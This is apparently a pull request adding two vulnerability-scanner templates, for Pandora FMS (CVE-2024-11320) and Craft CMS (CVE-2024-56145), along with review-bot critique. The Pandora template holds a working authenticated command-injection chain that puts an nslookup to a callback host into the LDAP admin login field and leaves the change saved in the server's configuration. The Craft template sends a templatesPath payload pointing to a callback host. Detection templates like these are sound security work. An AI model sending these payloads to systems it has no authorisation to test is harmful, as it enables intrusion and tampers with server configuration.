pandora-remote-code-execution CVE-2024-11320 #11281

Open. Wants to merge 6 commits into base: main
100 changes: 100 additions & 0 deletions http/cves/2024/CVE-2024-11320.yaml
@@ -0,0 +1,100 @@
id: CVE-2024-11320

info:
name: Pandora v7.0NG.777.3 - Remote Code Execution
author: DhiyaneshDK,Shubham Rooter
severity: critical
description: |
Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS- from 700 through <=777.4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-11320
cwe-id: CWE-77
epss-score: 0.00043
epss-percentile: 0.10436
cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:*
metadata:
vendor: pandorafms
product: pandora_fms
shodan-query:
- http.html:"pandora fms - installation wizard"
- http.title:"pandora fms"
fofa-query:
- body="pandora fms - installation wizard"
- title="pandora fms"
google-query: intitle:"pandora fms"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
- raw:
- |
GET /index.php?login=1 HTTP/1.1
Host: {{Hostname}}

extractors:
- type: regex
name: csrf_code
group: 1
regex:
- 'name="csrf_code" type="hidden" value="([a-z0-9]+)" \/>'
internal: true

- raw:
- |
POST /index.php?login=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}}

matchers:
- type: dsl
dsl:
- status_code == 302
- contains(set_cookie, 'PHPSESSID=')
condition: and
internal: true

- raw:
- |
GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'Server health')
condition: and
internal: true

- raw:
- |
GET /index.php?sec=general&sec2=godmode/setup/setup&section=auth HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, 'Authentication method</td>', 'LDAP')
condition: and
internal: true

- raw:
- |
POST /index.php?sec=general&sec2=godmode/setup/setup&section=auth HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}/index.php?sec=general&sec2=godmode/setup/setup&section=auth
Content-Type: application/x-www-form-urlencoded

update_config=1&csrf_code={{csrf_code}}&auth=ldap&fallback_local_auth=1&fallback_local_auth_sent=1&ldap_server=localhost&ldap_port=389&ldap_version=3&ldap_start_tls_sent=1&ldap_base_dn=ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg&ldap_login_attr=uid&ldap_admin_login=%27%3Bnslookup+{{interactsh-url}}+%23&ldap_admin_pass=test&ldap_search_timeout=0&secondary_ldap_enabled_sent=1&ldap_server_secondary=localhost&ldap_port_secondary=389&ldap_version_secondary=3&ldap_start_tls_secondary_sent=1&ldap_base_dn_secondary=ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg&ldap_login_attr_secondary=uid&ldap_admin_login_secondary=&ldap_admin_pass_secondary=&double_auth_enabled_sent=1&2FA_all_users_sent=1&session_timeout=90&update_button=Update&ldap_function=local

matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body,'Correctly updated the setup options')
condition: and
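Review bot: the final matcher in the last request (status 200 and 'Correctly updated the setup options') only proves that the setup form was saved, not that the injected `ldap_admin_login=%27%3Bnslookup+{{interactsh-url}}+%23` was executed; add `contains(interactsh_protocol, 'dns')` to that dsl block so a match requires the out-of-band callback. Two more points on the same POST: it reuses `{{csrf_code}}` extracted from the login page in the first request, while the setup page fetched in the fourth request has no extractor, so if that form carries its own token the update will be rejected and the template will fail silently (extract the token from the fourth response instead); and the update persists `auth=ldap` together with the injected admin login in the target's configuration with nothing restoring the previous values, which should at least be stated in the description. In the info block, `reference:` and `tags:` are missing (the other template in this PR has both), the description reads 'Pandora FMS- from 700 through <=777.4' and should drop the stray hyphen and write the range in the same form as the version in `name`, and the cvss-metrics string (PR:N) contradicts the template itself, which needs `{{username}}`/`{{password}}` and access to the godmode setup page; either correct the metrics or say in the description that the check is authenticated.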
57 changes: 57 additions & 0 deletions http/cves/2024/cve-2024-56145.yaml
@@ -0,0 +1,57 @@
id: cve-2024-56145

info:
name: Craft CMS Remote Code Execution (RCE)
author: Shubham Rooter
severity: critical
description: |
Craft CMS suffers from a Remote Code Execution (RCE) vulnerability due to improper handling of the `--configPath` parameter.
This template checks if the target is vulnerable and exploits it by triggering a reverse shell.
reference:
- https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms
tags: cve,cve2024,rce,craftcms

requests:
- method: GET
path:
- "{{BaseURL}}?--configPath=/{{randstr}}"

matchers-condition: and
matchers:
- type: status
status:
- 503

- type: word
words:
- "mkdir()"
part: body

extractors:
- type: regex
part: body
regex:
- "mkdir\\(\\)"

- method: GET
path:
- "{{BaseURL}}?--templatesPath=ftp://{{interactsh-url}}"

payloads:
default:
- "{{interactsh-payload}}"

attack: pitchfork
threads: 10

matchers:
- type: regex
regex:
- "{{interactsh-placeholder}}"
part: interactsh_protocol

extractors:
- type: regex
part: interactsh_protocol
regex:
- "{{interactsh-placeholder}}"
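Review bot: the description promises that the template 'exploits it by triggering a reverse shell', but the two requests only send `?--configPath=/{{randstr}}` and `?--templatesPath=ftp://{{interactsh-url}}` and look for an out-of-band hit, so the text should say it detects the issue via an interactsh callback and nothing more. In the second request, `payloads:` with `{{interactsh-payload}}`, `attack: pitchfork` and `threads: 10` serve no purpose because the path never references the `default` payload, and `{{interactsh-placeholder}}` in the matcher and extractor is not defined anywhere in the template; replace them with a `word` matcher on `part: interactsh_protocol` with `words: ["dns"]` and drop the extractor. Also use `http:` rather than the legacy `requests:` key, as the first template in this PR does, and make `id:` and the filename uppercase (`CVE-2024-56145`) to match `http/cves/2024/CVE-2024-11320.yaml`; `classification:` (cvss, cwe) and `metadata:` are missing too. The `mkdir\\(\\)` extractor in the first request only re-captures the literal already required by the word matcher and can be removed.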